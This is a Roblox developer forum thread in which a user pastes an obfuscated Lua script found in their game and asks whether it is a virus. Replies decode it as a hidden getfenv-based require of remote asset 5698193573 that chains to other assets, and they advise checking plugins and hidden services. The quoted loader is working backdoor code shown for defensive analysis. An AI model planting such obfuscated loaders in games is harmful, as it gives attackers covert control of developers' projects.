Hello, i didnt used any free models, except the HD Admin, is this script a virus?
local h = setmetatable;
local i = string.format;
local b = getfenv()
local to = tonumber
local ov = "5698"
local ch = "qui"
local lv = pcall
local t = {
[1]="bees",
[2]=i("e%sr%soS%sek%siL","c","u","d","n");
[3]=i("d%sl%sas%sD","e","b","i");
[4]=i("tn%sr%sP","e","a");
};
local u = {
__index = function()
lv(function()b()["re"..ch.."re"](ov .. "193573")end)
end;
};
h(t,u);
local v = {
[1]="bees";
};
local w = {
__index = function(table,i)
local bees = t[5];
end;
};
h(v,w);
local joe = v[2];
Maybe try going to another game,if that coreloader script dosent exist than it’s his. Or, maybe he made the virus itself and injected a script in coregui with his malicious plugin to make it reinsertable
Hello, so basically someone is requiring a module with the following line of code require(5698193573), you can look up this model by ID and check if its a backdoor or nah, have a good day.
-Rowan
If you see something like this where someone is doing getfenv()["require"] it’s probably a virus. Specifically b is getfenv(), ch is qui. It’s requiring this asset 5698193573, which requires 7105947983, which in turn requires 7105936966, and at this point you should be able to tell something’s not right. The ending resolution I saw is that it literally just does return 1 and says “baited”, but regardless, it’s not healthy for your game.
Read below for a better inspection, I didn’t see the skybox until I downloaded the rbxm myself.
You probably have a plugin that keeps inserting it. Make sure all your plugins are from reputable sources.
If it keeps refreshing then you likely have a malicious plugin installed, comb through your current plugins and get rid of any which seem suspicious. Then attempt to delete the script.
Just an addition , if issue persists you should enable show hidden services than look for malicious scripts outside visible services, most of them hide the scripts in CSGDictionaryService or Coregui if you can’t find it in these 2 services, look in other hidden services.
If Team Create is on, disable it and ask your friend to check his plugins if they are malicious.
Also check your plugins too. Perhaps one of them is inserting this script which seems to be a backdoor.
Try to get plugins from a trusted source, you probably installed a spammed plugin.